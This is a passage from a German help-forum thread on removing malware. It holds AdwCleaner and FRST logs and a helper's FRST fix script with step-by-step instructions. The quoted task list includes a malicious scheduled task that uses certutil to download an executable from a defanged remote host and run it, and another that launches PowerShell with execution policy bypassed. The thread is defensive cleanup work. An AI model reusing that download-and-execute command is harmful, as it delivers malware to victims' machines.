Deleted      C:\Windows\Syswow64\SSL
Deleted      C:\Users\Nico\AppData\Roaming\PARETOLOGIC
Deleted      C:\Windows\Temp\Smartbar
Deleted      C:\Windows\rss

***** [ Files ] *****

Deleted      C:\Windows\System32\mcicda64.dll
Deleted      C:\Users\Nico\AppData\Roaming\Mozilla\Firefox\Profiles\xub00lap.default\searchplugins\yahoo! powered.xml
Deleted      C:\Users\Nico\AppData\Roaming\Mozilla\Firefox\Profiles\xub00lap.default\invalidprefs.js
Deleted      C:\Users\Nico\appdata\local\installationconfiguration.xml
Deleted      C:\Users\Nico\AppData\Local\Main.dat
Deleted      C:\Windows\Temp\reimage.log
Deleted      C:\Windows\Reimage.ini
Deleted      C:\Windows\SysWOW64\findit.xml
Deleted      C:\Windows\System32\drivers\Winmon.sys
Deleted      C:\Windows\System32\drivers\WinmonFS.sys
Deleted      C:\Windows\System32\drivers\WinmonProcessMonitor.sys

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

Deleted      C:\Users\Nico\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk

***** [ Tasks ] *****

Deleted      C:\Windows\System32\Tasks\ScheduledUpdate
Deleted      C:\Windows\System32\Tasks\ReimageUpdater
Deleted      C:\Windows\System32\Tasks\WindowsRecoveryCleaner

***** [ Registry ] *****

Deleted      HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{66E7FCFF-AEE1-4593-AF28-7B81A60E82D7}
Deleted      HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ScheduledUpdate
Deleted      HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564
Deleted      HKLM\Software\Wow6432Node\mtSubair
Deleted      HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\Subair.exe
Deleted      HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{C0D38E5A-7CF8-4105-8FE8-31B81443A114}
Deleted      HKLM\Software\Wow6432Node\Classes\CLSID\{C0D38E5A-7CF8-4105-8FE8-31B81443A114}
Deleted      HKLM\Software\Classes\CLSID\{C0D38E5A-7CF8-4105-8FE8-31B81443A114}
Deleted      HKCU\Software\Microsoft\BigTime
Deleted      HKU\S-1-5-18\Software\ByteFence
Deleted      HKU\.DEFAULT\Software\ByteFence
Deleted      HKLM\Software\Wow6432Node\RegisteredApplications|FLV and Media Player
Deleted      HKLM\SOFTWARE\RegisteredApplications|FLV and Media Player
Deleted      HKCU\Software\FastDataX
Deleted      HKCU\Software\EpicNet Inc.
Deleted      HKCU\Software\csastats
Deleted      HKLM\Software\Microsoft\DMunversion
Deleted      HKCU\Software\CoinisRevShare
Deleted      HKCU\Software\ParetoLogic
Deleted      HKLM\Software\Wow6432Node\ParetoLogic
Deleted      HKCU\Software\WebDiscoverBrowser
Deleted      HKLM\Software\Wow6432Node\WebDiscoverBrowser
Deleted      HKLM\Software\WebDiscoverBrowser
Deleted      HKLM\Software\Wow6432Node\Classes\AppID\REI_AxControl.DLL
Deleted      HKLM\SOFTWARE\Classes\AppID\REI_AxControl.DLL
Deleted      HKLM\Software\Wow6432Node\Classes\AppID\{28FF42B8-A0DA-4BE5-9B81-E26DD59B350A}
Deleted      HKLM\Software\Classes\AppID\{28FF42B8-A0DA-4BE5-9B81-E26DD59B350A}
Deleted      HKLM\Software\Wow6432Node\Classes\TypeLib\{FA6468D2-FAA4-4951-A53B-2A5CF9CC0A36}
Deleted      HKLM\Software\Classes\TypeLib\{FA6468D2-FAA4-4951-A53B-2A5CF9CC0A36}
Deleted      HKLM\Software\Wow6432Node\Classes\Interface\{BD51A48E-EB5F-4454-8774-EF962DF64546}
Deleted      HKLM\Software\Classes\Interface\{BD51A48E-EB5F-4454-8774-EF962DF64546}
Deleted      HKLM\Software\Wow6432Node\Classes\Interface\{9BB31AD8-5DB2-459E-A901-DEA536F23BA4}
Deleted      HKLM\Software\Classes\Interface\{9BB31AD8-5DB2-459E-A901-DEA536F23BA4}
Deleted      HKLM\Software\Classes\CLSID\{801B440B-1EE3-49B0-B05D-2AB076D4E8CB}
Deleted      HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{10ECCE17-29B5-4880-A8F5-EAD298611484}
Deleted      HKLM\Software\Classes\CLSID\{10ECCE17-29B5-4880-A8F5-EAD298611484}
Deleted      HKLM\System\CurrentControlSet\Services\EventLog\Application\Application Hosting
Deleted      HKCU\Software\PRODUCTSETUP
Deleted      HKCU\Software\Reimage
Deleted      HKLM\Software\Reimage
Deleted      HKCU\Software\Local AppWizard-Generated Applications\Reimage - Windows Problem Relief.
Deleted      HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{BAD80BEE-7129-4A3C-B9FA-580ED44A6159}
Deleted      HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ReimageUpdater
Deleted      HKCU\Environment|SNP
Deleted      HKCU\Environment|SNF
Deleted      HKCU\Software\System Healer
Deleted      HKCU\Software\MICROSOFT\wewewe
Deleted      HKLM\Software\Wow6432Node\CLASSES\APPID\56BF5154-0B48-4ADB-902A-6C8B12E270D9
Deleted      HKLM\SOFTWARE\CLASSES\APPID\56BF5154-0B48-4ADB-902A-6C8B12E270D9
Deleted      HKCU\Software\Microsoft\{cc6eb6d8-85b7-435p-8b86-51e4d16ea76d}
Deleted      HKLM\Software\Microsoft\PrIncub
Deleted      HKLM\Software\Microsoft\MPrForShutT
Deleted      HKLM\Software\Microsoft\PrAmNP
Deleted      HKLM\Software\Microsoft\NSaveA
Deleted      HKLM\Software\Microsoft\APreSam
Deleted      HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{5b0c3e0d-0e9b-4ebd-a5de-222a48f16015}
Deleted      HKCU\Software\WidModule
Deleted      HKLM\Software\texttotalk
Deleted      HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{C6FD6CF5-A7E5-4DC3-A8A0-17D3A10CD175}
Deleted      HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C6FD6CF5-A7E5-4DC3-A8A0-17D3A10CD175}
Deleted      HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\WindowsRecoveryCleaner

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries cleaned.

***** [ Chromium URLs ] *****

No malicious Chromium URLs cleaned.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.


*************************

[+] Delete IFEO
[+] Delete Prefetch
[+] Delete Tracing Keys
[+] Reset BITS
[+] Reset Windows Firewall
[+] Reset Chromium Policies
[+] Reset IE Policies
[+] Reset Proxy Settings
[+] Reset Winsock

*************************


########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########

M-K-D-B 31.05.2018 20:30
Servus,


du hast dreimal die fixlog.txt gepostet... :D

Es fehlt die eine Logdatei von FRST (FRST.txt), bitte in Code-Box nachreichen.

Dann kann es weitergehen. ;)

Danke! :)

moinbro 01.06.2018 08:57
Sorry:pfeiff:

ist zu groß für die Code-Box

M-K-D-B 01.06.2018 09:26
Servus,




bitte bis auf Weiteres nichts mehr installieren oder deinstallieren!

Der erste FRST-Fix lief nicht durch, daher versuchen wir es jetzt so:




Schritt 1
  • Kopiere den gesamten Inhalt der folgenden Code-Box:
    Code:
    Start::
    HKLM\...\Run: [JServicesManager] => C:\Program Files\SystemaRev\RevServicesX\runrev64.ex
    HKLM-x32\...\Run: [JServicesManager] => C:\Program Files\SystemaRev\RevServicesX\runrev64.ex
    C:\Program Files\SystemaRev
    S2 WNetworkMgmt; "C:\ProgramData\Microsoft\Windows\WNetworkMgmt\WNetworkMgmt.exe"  [X]
    C:\ProgramData\Microsoft\Windows\WNetworkMgmt
    S3 FairplayKD; \??\C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys [X]
    S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
    S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
    S3 VGPU; System32\drivers\rdvgkmd.sys [X]
    R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] () <==== ACHTUNG (Null Byte Datei/Ordner)
    R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (Windows (R) Win 7 DDK provider) <==== ACHTUNG (Null Byte Datei/Ordner)
    R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2018-05-27] () [Datei ist nicht signiert]
    C:\Windows\System32\drivers\WinmonProcessMonitor.sys
    C:\Windows\System32\drivers\WinmonFS.sys
    C:\Windows\System32\drivers\Winmon.sys
    2018-05-28 14:53 - 2018-05-28 14:53 - 000003824 _____ C:\Windows\System32\Tasks\MainPMgr
    2018-05-28 14:53 - 2018-05-28 14:53 - 000003786 _____ C:\Windows\System32\Tasks\SystemUpdate64
    2018-05-28 14:53 - 2018-05-28 14:53 - 000000000 ____D C:\Program Files\SystemaRev
    2018-05-28 14:38 - 2018-05-28 14:42 - 000189686 _____ C:\Windows\ntbtlog.txt
    2018-05-27 15:09 - 2018-05-27 15:09 - 000000000 ____D C:\ProgramData\SystemaRev
    2018-05-27 14:57 - 2018-05-27 14:57 - 000004270 _____ C:\Windows\System32\Tasks\ReimageUpdater
    2018-05-27 14:56 - 2018-05-28 14:40 - 000000150 _____ C:\Windows\Reimage.ini
    2018-05-27 14:50 - 2018-05-27 14:50 - 000000000 ____D C:\Users\Nico\AppData\Roaming\ParetoLogic
    2018-05-27 10:47 - 2018-05-27 11:15 - 000000000 ____D C:\Windows\SysWOW64\SSL
    2018-05-27 10:47 - 2018-05-27 11:12 - 000929792 _____ C:\Users\Nico\AppData\Local\sham.db
    2018-05-27 10:47 - 2018-05-27 10:53 - 000016080 _____ C:\Users\Nico\AppData\Local\InstallationConfiguration.xml
    2018-05-27 10:47 - 2018-05-27 10:47 - 007611392 _____ C:\Users\Nico\AppData\Local\agent.dat
    2018-05-27 10:47 - 2018-05-27 10:47 - 002136576 _____ (TODO: <Company name>) C:\Users\Nico\AppData\Local\Hottam.exe
    2018-05-27 10:47 - 2018-05-27 10:47 - 001987748 _____ C:\Users\Nico\AppData\Local\Hottam.tst
    2018-05-27 10:47 - 2018-05-27 10:47 - 001895382 _____ C:\Users\Nico\AppData\Local\Jaytip.bin
    2018-05-27 10:47 - 2018-05-27 10:47 - 001620480 _____ C:\Windows\qcusolizqbhuglpw.qcus
    2018-05-27 10:47 - 2018-05-27 10:47 - 000278510 _____ C:\Users\Nico\AppData\Local\VoltFinlab.bin
    2018-05-27 10:47 - 2018-05-27 10:47 - 000140800 _____ C:\Users\Nico\AppData\Local\installer.dat
    2018-05-27 10:47 - 2018-05-27 10:47 - 000126464 _____ C:\Users\Nico\AppData\Local\noah.dat
    2018-05-27 10:47 - 2018-05-27 10:47 - 000070896 _____ C:\Users\Nico\AppData\Local\Config.xml
    2018-05-27 10:47 - 2018-05-27 10:47 - 000018432 _____ C:\Users\Nico\AppData\Local\Main.dat
    2018-05-27 10:47 - 2018-05-27 10:47 - 000015610 _____ C:\Windows\SysWOW64\findit.xml
    2018-05-27 10:47 - 2018-05-27 10:47 - 000005568 _____ C:\Users\Nico\AppData\Local\md.xml
    2018-05-27 10:47 - 2018-05-27 10:47 - 000000000 ____D C:\ProgramData\Logic Cramble
    2018-05-27 09:58 - 2018-05-27 09:58 - 000000306 __RSH C:\Users\Nico\ntuser.pol
    2018-05-27 09:58 - 2018-05-27 09:58 - 000000000 ____D C:\Users\Nico\AppData\Roaming\FastDataX
    2018-05-27 09:57 - 2018-05-27 09:57 - 000000000 ____D C:\Users\Nico\AppData\Local\XService
    2018-05-27 09:57 - 2018-05-27 09:57 - 000000000 ____D C:\Users\Nico\AppData\Local\Package Cache
    2018-05-27 09:49 - 2018-05-27 09:49 - 000000000 ____D C:\Users\Nico\AppData\Roaming\EpicNet Inc
    2018-05-27 09:48 - 2018-05-28 14:44 - 000003502 _____ C:\Windows\System32\Tasks\ScheduledUpdate
    2018-05-27 09:48 - 2018-05-28 14:44 - 000003172 _____ C:\Windows\System32\Tasks\csrss
    2018-05-27 09:48 - 2018-05-27 09:48 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
    2018-05-27 09:48 - 2018-05-27 09:48 - 000004180 _____ C:\Windows\System32\Tasks\AncillaryFunctionauf
    2018-05-27 09:48 - 2018-05-27 09:48 - 000000000 ____D C:\Users\Nico\AppData\Local\betterworld
    2018-05-27 09:48 - 2018-03-24 14:51 - 002990080 _____ C:\Windows\system32\mcicda64.dll
    2018-05-27 09:47 - 2018-05-28 16:07 - 000003702 _____ C:\Windows\System32\Tasks\WindowsRecoveryCleaner
    2018-05-27 09:47 - 2018-05-28 14:44 - 000000034 _____ C:\Users\Public\Documents\{DE764086-1C0A-4DD3-90BA-0B93BDD794BE}
    2018-05-27 09:47 - 2018-05-27 11:41 - 000003082 __RSH C:\ProgramData\ntuser.pol
    2018-05-27 09:47 - 2018-05-27 10:22 - 000016718 _____ C:\Windows\System32\Tasks\Social Software
    2018-05-27 09:47 - 2018-05-27 09:47 - 002032128 ___SH (Apple Inc.) C:\ProgramData\Iostream.exe
    2018-05-27 09:47 - 2018-05-27 09:47 - 000043520 _____ C:\Users\Nico\AppData\Local\pfialx.dll
    2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_OT
    2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_FG
    2018-05-27 09:47 - 2018-05-27 09:47 - 000004480 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_AM
    2018-05-27 09:47 - 2018-05-27 09:47 - 000004468 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ
    2018-05-27 09:47 - 2018-05-27 09:47 - 000004444 _____ C:\Windows\System32\Tasks\GoogleUpdateSecurityTaskMachine_NM
    2018-05-27 09:47 - 2018-05-27 09:47 - 000000000 ____D C:\Users\Public\Documents\XMUpdate
    2018-05-27 09:47 - 2018-05-27 09:47 - 000000000 ____D C:\Program Files\Common Files\5ZNAWZD2EL69
    2018-05-27 08:56 - 2018-05-27 08:56 - 000001285 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HowToRemove.lnk
    2018-05-27 08:56 - 2018-05-27 08:56 - 000000000 ____D C:\Users\Nico\AppData\LocalLow\AMD
    2018-05-26 14:03 - 2018-05-26 14:03 - 001592320 _____ C:\Windows\2045f4764aa9c27a5e23cd56fa5420a8.exe
    2018-05-26 14:03 - 2018-05-26 14:03 - 000039584 _____ C:\Windows\uninstaller.dat
    2018-05-25 12:23 - 2018-05-25 12:23 - 000000000 ___HD C:\Windows\msdownld.tmp
    2018-05-27 09:47 - 2018-05-27 09:47 - 002032128 ___SH (Apple Inc.) C:\ProgramData\Iostream.exe
    2018-05-25 01:01 - 2018-05-25 01:01 - 000000184 ____H () C:\Program Files (x86)\Common Files\new.bat
    2018-05-27 10:47 - 2018-05-27 10:47 - 007611392 _____ () C:\Users\Nico\AppData\Local\agent.dat
    2018-05-27 10:47 - 2018-05-27 10:47 - 000070896 _____ () C:\Users\Nico\AppData\Local\Config.xml
    2018-05-27 10:47 - 2018-05-27 10:47 - 002136576 _____ (TODO: <Company name>) C:\Users\Nico\AppData\Local\Hottam.exe
    2018-05-27 10:47 - 2018-05-27 10:47 - 001987748 _____ () C:\Users\Nico\AppData\Local\Hottam.tst
    2018-05-27 10:47 - 2018-05-27 10:53 - 000016080 _____ () C:\Users\Nico\AppData\Local\InstallationConfiguration.xml
    2018-05-27 10:47 - 2018-05-27 10:47 - 000140800 _____ () C:\Users\Nico\AppData\Local\installer.dat
    2018-05-27 10:47 - 2018-05-27 10:47 - 001895382 _____ () C:\Users\Nico\AppData\Local\Jaytip.bin
    2018-05-27 10:47 - 2018-05-27 10:47 - 000018432 _____ () C:\Users\Nico\AppData\Local\Main.dat
    2018-05-27 10:47 - 2018-05-27 10:47 - 000005568 _____ () C:\Users\Nico\AppData\Local\md.xml
    2018-05-27 10:47 - 2018-05-27 10:47 - 000126464 _____ () C:\Users\Nico\AppData\Local\noah.dat
    2018-05-27 09:47 - 2018-05-27 09:47 - 000043520 _____ () C:\Users\Nico\AppData\Local\pfialx.dll
    2018-02-05 20:57 - 2018-05-27 13:14 - 000007654 _____ () C:\Users\Nico\AppData\Local\Resmon.ResmonCfg
    2018-05-27 10:47 - 2018-05-27 11:12 - 000929792 _____ () C:\Users\Nico\AppData\Local\sham.db
    2018-05-27 10:47 - 2018-05-27 10:47 - 000032038 _____ () C:\Users\Nico\AppData\Local\uninstall_temp.ico
    2018-05-27 10:47 - 2018-05-27 10:47 - 000278510 _____ () C:\Users\Nico\AppData\Local\VoltFinlab.bin
    ShellIconOverlayIdentifiers: [{BFD98515-CD74-48A4-98E2-13D209E3EE4F}] -> {BFD98515-CD74-48A4-98E2-13D209E3EE4F} => C:\Windows\system32\mcicda64.dll [2018-03-24] ()
    C:\Windows\system32\mcicda64.dll
    Task: {099A856C-08D3-43C8-AD18-3D651763C816} - System32\Tasks\Social Software => C:\Windows\system32\rundll32.exe "C:\Program Files\Social Software\Social Software.dll",UjaAssDjw <==== ACHTUNG
    C:\Program Files\Social Software
    Task: {1622AF7B-53DD-4FEE-8BE9-907C9F57AA98} - System32\Tasks\SystemUpdate64 => C:\Program Files\SystemaRev\RevServicesX\SystemUpdate64.exe [2018-05-27] (SystemaRev)
    C:\Program Files\SystemaRev
    Task: {1913E8F8-F8A7-47F0-A2D5-DF77C0226E3E} - System32\Tasks\GoogleUpdateSecurityTaskMachine_FG => C:\Users\Nico\AppData\Local\Temp\36dd72f0d5c24801a35656466bd03b9d\HandlerExecution.exe <==== ACHTUNG
    C:\Users\Nico\AppData\Local\Temp\36dd72f0d5c24801a35656466bd03b9d
    Task: {28FB99D2-B4C3-4FD4-8949-3C860CE2DE24} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-05-27] () <==== ACHTUNG
    Task: {412B9FDA-8C4C-40F4-A23C-696805866F9C} - System32\Tasks\AncillaryFunctionauf => C:\Program Files (x86)\nodejs\node.exe
    C:\Program Files (x86)\nodejs
    Task: {42767FB3-1423-4F1B-8F31-8B5936FA8F06} - System32\Tasks\GoogleUpdateSecurityTaskMachine_VJ => C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22\HandlerExecution.exe <==== ACHTUNG
    C:\Users\Nico\AppData\Roaming\a4d85c2ba162448f9d08d690843ffb22
    Task: {478261E4-F178-4CD8-8575-B8ACE5A0769E} - System32\Tasks\GoogleUpdateSecurityTaskMachine_AM => C:\Users\Nico\AppData\Local\Temp\be1f0849f130446da031e35271bfb3f7\HandlerExecution.exe <==== ACHTUNG
    C:\Users\Nico\AppData\Local\Temp\be1f0849f130446da031e35271bfb3f7
    Task: {6372E416-89E4-46ED-A9C3-6F1F6F797A15} - System32\Tasks\GoogleUpdateSecurityTaskMachine_NM => C:\Users\Nico\AppData\Roaming\6c3a24720f8d4be29080877f498e5aa9\HandlerExecution.exe <==== ACHTUNG
    C:\Users\Nico\AppData\Roaming\6c3a24720f8d4be29080877f498e5aa9
    Task: {66E7FCFF-AEE1-4593-AF28-7B81A60E82D7} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/app/4/app.exe C:\Users\Nico\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Nico\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ACHTUNG
    Task: {6E7DD5F8-0819-4296-8B92-EEA20358E2F3} - System32\Tasks\MainPMgr => powershell -ExecutionPolicy ByPass -File pm.ps1
    Task: {AB4D74FB-B89A-4A74-982B-76AE532F4F7F} - System32\Tasks\GoogleUpdateSecurityTaskMachine_OT => C:\Users\Nico\AppData\Local\Temp\f4e669f936dd4a41b8d1678962b0fc78\HandlerExecution.exe <==== ACHTUNG
    C:\Users\Nico\AppData\Local\Temp\f4e669f936dd4a41b8d1678962b0fc78
    Task: {BAD80BEE-7129-4A3C-B9FA-580ED44A6159} - System32\Tasks\ReimageUpdater => C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe <==== ACHTUNG
    C:\Program Files\Reimage
    Task: {C6FD6CF5-A7E5-4DC3-A8A0-17D3A10CD175} - System32\Tasks\WindowsRecoveryCleaner => C:\ProgramData\Iostream.exe [2018-05-27] (Apple Inc.) <==== ACHTUNG
    C:\ProgramData\Iostream.exe
    ShortcutWithArgument: C:\Users\Nico\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
    AlternateDataStreams: C:\ProgramData:NT [40]
    AlternateDataStreams: C:\ProgramData:NT2 [552]
    AlternateDataStreams: C:\Users\All Users:NT [40]
    AlternateDataStreams: C:\Users\All Users:NT2 [552]
    AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT [40]
    AlternateDataStreams: C:\ProgramData\Anwendungsdaten:NT2 [552]
    AlternateDataStreams: C:\ProgramData\Application Data:NT [40]
    AlternateDataStreams: C:\ProgramData\Application Data:NT2 [552]
    AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT [40]
    AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2 [552]
    AlternateDataStreams: C:\Users\Nico\Anwendungsdaten:NT [40]
    AlternateDataStreams: C:\Users\Nico\Anwendungsdaten:NT2 [552]
    AlternateDataStreams: C:\Users\Nico\AppData\Roaming:NT [40]
    AlternateDataStreams: C:\Users\Nico\AppData\Roaming:NT2 [552]
    AlternateDataStreams: C:\Users\Public\AppData:CSM [472]
    Unlock: C:\Windows\system32\Drivers\etc\hosts
    C:\Windows\system32\Drivers\etc\hosts
    Hosts:
    VirusTotal: C:\Windows\system32\ntkrnlmp.exe
    VirusTotal: C:\Windows\system32\osloader.exe
    VirusTotal: C:\ProgramData\Microsoft\Windows\Audio\winamgr.exe
    CMD: dir "%ProgramFiles%"
    CMD: dir "%ProgramFiles(x86)%"
    CMD: dir "%ProgramData%"
    CMD: dir "%Appdata%"
    CMD: dir "%LocalAppdata%"
    CMD: dir "%CommonProgramFiles(x86)%"
    CMD: dir "%CommonProgramW6432%"
    CMD: dir "%UserProfile%"
    CMD: dir "C:\"
    ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
    RemoveProxy:
    CMD: ipconfig /flushdns
    cmd: netsh winsock reset catalog
    cmd: netsh advfirewall reset
    cmd: netsh advfirewall set allprofiles state ON
    cmd: Bitsadmin /Reset /Allusers
    EmptyTemp:
    End::
  • Starte nun FRST und klicke direkt den Entfernen Button. Wichtig: Du brauchst den Inhalt der Code-Box nirgends einfügen, da sich FRST den Code aus der Zwischenablage holt!
  • Das Tool führt die gewünschten Schritte aus und erstellt eine fixlog.txt im selben Verzeichnis, in dem sich die FRST/FRST64.exe befindet.
  • Gegebenenfalls muss dein Rechner dafür neu gestartet werden.
  • Poste mir den Inhalt der fixlog.txt mit deiner nächsten Antwort.





Schritt 2
  • Starte die FRST.exe erneut. Vergewissere dich, dass vor Addition.txt ein Haken gesetzt ist und drücke auf Untersuchen.
  • FRST erstellt wieder zwei Logdateien (FRST.txt und Addition.txt).
  • Poste mir beide Logdateien mit deiner nächsten Antwort.






Bitte poste mit deiner nächsten Antwort
  • die Logdatei des FRST-Fix (fixlog.txt),
  • die beiden neuen Logdateien von FRST (FRST.txt und Addition.txt).

moinbro 01.06.2018 09:49
Fixlog.txt

Code:
Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 16.05.2018 01
durchgeführt von Nico (01-06-2018 10:33:19) Run:2
Gestartet von C:\Users\Nico\Downloads
Geladene Profile: Nico (Verfügbare Profile: Nico)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
HKLM\...\Run: [JServicesManager] => C:\Program Files\SystemaRev\RevServicesX\runrev64.ex
HKLM-x32\...\Run: [JServicesManager] => C:\Program Files\SystemaRev\RevServicesX\runrev64.ex
C:\Program Files\SystemaRev
S2 WNetworkMgmt; "C:\ProgramData\Microsoft\Windows\WNetworkMgmt\WNetworkMgmt.exe"  [X]
C:\ProgramData\Microsoft\Windows\WNetworkMgmt
S3 FairplayKD; \??\C:\ProgramData\MTA San Andreas All\Common\temp\FairplayKD.sys [X]
S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X]
S3 tsusbhub; system32\drivers\tsusbhub.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] () <==== ACHTUNG (Null Byte Datei/Ordner)
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (Windows (R) Win 7 DDK provider) <==== ACHTUNG (Null Byte Datei/Ordner)
R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2018-05-27] () [Datei ist nicht signiert]
C:\Windows\System32\drivers\WinmonProcessMonitor.sys
C:\Windows\System32\drivers\WinmonFS.sys
C:\Windows\System32\drivers\Winmon.sys
2018-05-28 14:53 - 2018-05-28 14:53 - 000003824 _____ C:\Windows\System32\Tasks\MainPMgr
2018-05-28 14:53 - 2018-05-28 14:53 - 000003786 _____ C:\Windows\System32\Tasks\SystemUpdate64
2018-05-28 14:53 - 2018-05-28 14:53 - 000000000 ____D C:\Program Files\SystemaRev
2018-05-28 14:38 - 2018-05-28 14:42 - 000189686 _____ C:\Windows\ntbtlog.txt
2018-05-27 15:09 - 2018-05-27 15:09 - 000000000 ____D C:\ProgramData\SystemaRev
2018-05-27 14:57 - 2018-05-27 14:57 - 000004270 _____ C:\Windows\System32\Tasks\ReimageUpdater
2018-05-27 14:56 - 2018-05-28 14:40 - 000000150 _____ C:\Windows\Reimage.ini
2018-05-27 14:50 - 2018-05-27 14:50 - 000000000 ____D C:\Users\Nico\AppData\Roaming\ParetoLogic
2018-05-27 10:47 - 2018-05-27 11:15 - 000000000 ____D C:\Windows\SysWOW64\SSL
2018-05-27 10:47 - 2018-05-27 11:12 - 000929792 _____ C:\Users\Nico\AppData\Local\sham.db
2018-05-27 10:47 - 2018-05-27 10:53 - 000016080 _____ C:\Users\Nico\AppData\Local\InstallationConfiguration.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 007611392 _____ C:\Users\Nico\AppData\Local\agent.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 002136576 _____ (TODO: <Company name>) C:\Users\Nico\AppData\Local\Hottam.exe
2018-05-27 10:47 - 2018-05-27 10:47 - 001987748 _____ C:\Users\Nico\AppData\Local\Hottam.tst
2018-05-27 10:47 - 2018-05-27 10:47 - 001895382 _____ C:\Users\Nico\AppData\Local\Jaytip.bin
2018-05-27 10:47 - 2018-05-27 10:47 - 001620480 _____ C:\Windows\qcusolizqbhuglpw.qcus
2018-05-27 10:47 - 2018-05-27 10:47 - 000278510 _____ C:\Users\Nico\AppData\Local\VoltFinlab.bin
2018-05-27 10:47 - 2018-05-27 10:47 - 000140800 _____ C:\Users\Nico\AppData\Local\installer.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000126464 _____ C:\Users\Nico\AppData\Local\noah.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000070896 _____ C:\Users\Nico\AppData\Local\Config.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000018432 _____ C:\Users\Nico\AppData\Local\Main.dat
2018-05-27 10:47 - 2018-05-27 10:47 - 000015610 _____ C:\Windows\SysWOW64\findit.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000005568 _____ C:\Users\Nico\AppData\Local\md.xml
2018-05-27 10:47 - 2018-05-27 10:47 - 000000000 ____D C:\ProgramData\Logic Cramble
2018-05-27 09:58 - 2018-05-27 09:58 - 000000306 __RSH C:\Users\Nico\ntuser.pol
2018-05-27 09:58 - 2018-05-27 09:58 - 000000000 ____D C:\Users\Nico\AppData\Roaming\FastDataX
2018-05-27 09:57 - 2018-05-27 09:57 - 000000000 ____D C:\Users\Nico\AppData\Local\XService
2018-05-27 09:57 - 2018-05-27 09:57 - 000000000 ____D C:\Users\Nico\AppData\Local\Package Cache
2018-05-27 09:49 - 2018-05-27 09:49 - 000000000 ____D C:\Users\Nico\AppData\Roaming\EpicNet Inc
2018-05-27 09:48 - 2018-05-28 14:44 - 000003502 _____ C:\Windows\System32\Tasks\ScheduledUpdate
2018-05-27 09:48 - 2018-05-28 14:44 - 000003172 _____ C:\Windows\System32\Tasks\csrss
2018-05-27 09:48 - 2018-05-27 09:48 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
2018-05-27 09:48 - 2018-05-27 09:48 - 000004180 _____ C:\Windows\System32\Tasks\AncillaryFunctionauf
2018-05-27 09:48 - 2018-05-27 09:48 - 000000000 ____D C:\Users\Nico\AppData\Local\betterworld
2018-05-27 09:48 - 2018-03-24 14:51 - 002990080 _____ C:\Windows\system32\mcicda64.dll
2018-05-27 09:47 - 2018-05-28 16:07 - 000003702 _____ C:\Windows\System32\Tasks\WindowsRecoveryCleaner
2018-05-27 09:47 - 2018-05-28 14:44 - 000000034 _____ C:\Users\Public\Documents\{DE764086-1C0A-4DD3-90BA-0B93BDD794BE}
